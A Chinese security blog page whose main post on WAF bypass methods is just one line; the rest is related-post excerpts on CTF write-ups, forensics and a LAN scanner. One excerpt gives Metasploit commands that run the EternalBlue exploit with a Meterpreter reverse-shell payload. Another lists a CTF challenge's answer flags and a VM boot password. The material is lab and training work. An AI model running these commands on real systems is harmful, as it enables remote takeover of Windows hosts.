WAF的常见绕过方法
发表于|更新于
|浏览量:
1 | 这个是网上看到的二向箔WAF资料,感觉挺好的,借鉴一下 |
文章作者: Benben Dan
文章链接: http://47.97.97.224/2025/05/07/WAF%E7%9A%84%E5%B8%B8%E8%A7%81%E7%BB%95%E8%BF%87%E6%96%B9%E6%B3%95/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 BenD!
相关推荐

2026-01-02
MSF获取Windows的shell后
扫描器的使用use auxiliary/scanner/smb/smb_ms17_010 攻击模块的使用下一步操作:发起攻击 (Exploit) 既然扫描器已经告诉你目标是“易受攻击”的,你现在的动作应该是从 辅助模块(Scanner) 切换到 攻击模块(Exploit)。 请按照以下顺序输入命令: 切换模块: Bash 1use exploit/windows/smb/ms17_010_eternalblue 设置目标 IP: Bash 1set RHOSTS 192.168.20.135 设置攻击载荷(通常默认就是这个,但建议检查一下): Bash 1set PAYLOAD windows/x64/meterpreter/reverse_tcp 设置你自己的 IP(Kali 的 IP,用于接收反弹回来的 Shell): Bash 12# 先在另一个终端用 ip addr 确认你的网卡 IPset LHOST [你的Kali的IP] 开火攻击: Bash 1exploit 进入Windows之后的操作 1. 基础环境与权限感知在任何操作...

2025-05-17
第二届“Parloo”CTF应急响应挑战赛-学生组(CTF)
title: 第二届Parloo杯CTF应急响应挑战赛date: 2025-05-18 13:23:32categories: 网络安全tags: ctf 网络安全 应急响应 密码学 python banner_img: /img/df0fd0ee5e9bd441452f544d6a3b6250.png banner_img_height: 84 banner_mask_alpha: 0.3 Crypto循环锁链12311 0D 19 0E 12 2A 74 42 31 2B 25 00 07 0C 16 3927 21 03 00 28 0D 27 20 26 2C 19 00 0C 3B 04 3922 19 52 44 0D 还原思路简述 加密逻辑猜测 题面提示“每个字节被锁在一个无尽的循环中”,很像典型的环形 XOR: 1c[i] = p[i] ⊕ p[(i+1) mod N] (0 ≤ i < N) 其中 p 为明文,c 为给出的 37 字节密文。 利用已知前缀定位“起点” 已知 flag 以 1pal...

2025-05-18
第二届“Parloo”CTF应急响应挑战赛-学生组(应急响应)

2025-12-06
局域网主机扫描
🌐 局域网扫描器 - 开发与使用文档项目地址:https://github.com/benbenbendang/scanner_nmap 1. 项目简介本项目是一个基于 Python 开发的局域网主机扫描工具。它不仅具备强大的网络探测功能,更拥有独特的赛博朋克 (Cyberpunk) 风格图形界面。软件旨在帮助网络管理员或极客用户快速识别当前网段内的存活主机、检测操作系统类型以及开放端口。 2. 功能特性 (Features)🛠 核心功能 网卡自动识别:启动时自动读取系统网络接口信息(IP/子网掩码),支持用户下拉选择目标网卡。 ARP 存活扫描:利用 ARP 协议(二层网络)快速、准确地发现同一局域网内的所有在线设备。 操作系统指纹识别:通过发送 ICMP 数据包并分析 TTL(生存时间)值,启发式地判断目标是 Windows、Linux/Android 还是网络设备。 端口安全检测:对发现的主机进行常用端口(如 21, 22, 80, 445, 3389 等)扫描,评估开放服务情况。 多线程处理:扫描过程在独立线程中运行,保证界面流畅不卡顿,并提供实...

2026-01-31
Autopsy的使用方法
Autopsy的使用方法kali中使用方法 先在终端中启动这个程序,然后会生成一个9999端口的网站,直接点击访问 点击New Case 创建案例 因为原本是英文的,所以直接翻译了,然后这个地方案件名称、描述,调查员姓名(只填a即可)都可以随便填,看你自己, 中译一下,方便查看,直接Add Host添加主机 1. 核心设置项 Host Name(主机名): 必填项。给这台设备起个名字,比如 host1 或 target_pc。只能包含字母、数字和符号。 Description(描述): 选填。简单备注一下这台设备是什么,例如“嫌疑人的办公电脑”。 2. 时间与同步设置(对取证非常重要) Time zone(时区): 选填。如果你知道原设备所在的时区,可以在这里设置(例如 GMT+8)。这能确保你后续在 Timeline(时间线) 分析中看到的是准确的当地时间。 Timeskew Adjustment(时间偏移调整): 选填。如果原设备的系统时间比准确时间快了或慢了,你可以在这里输入秒数进行补偿(例如快了 10 秒,就填 -10)。 3. 进阶数据库(做 CTF 或常...

2026-01-20
流量分析和Windows应急响应的部分原创题(含附件)
1.misc,先给一个压缩包伪装加密,然后提供一个图片,图片使用zsteg隐写提示文件分离的压缩包解压密码,然后解压出doro.doc,rodo.doc中藏一个图片,图片下方放入flag 解压密码:GIF_LSB_Ezflag 最终flag{Ctts_get_the_flag!!} 2.使用Windows搭建一个网站,进行应急响应 开机密码:xiaochen112233 2.流量分析应急响应—流量分析 1.hack的IP地址作为flag提交 flag{192.168.20.137} 2.hack访问的端口有哪些?从小到大排序提交,flag{xx,xx,xx,xx} flag{80,433} 3,hack找到的第一个可注入网页名称是什么? flag{shell.php} 4.hack上传的木马文件名称是什么? flag{1233.php} 5.hack的木马key是什么? flag{cmd} 6.靶机的系统版本是多少?hint:只需要写版本号即可 flag{6.1.7601} 7.hack执行的第一个命令是什么? flag{dir} 8.hack获取的开机密码是多少? flag{x...
公告
愿诸位道友心境,四季如春




















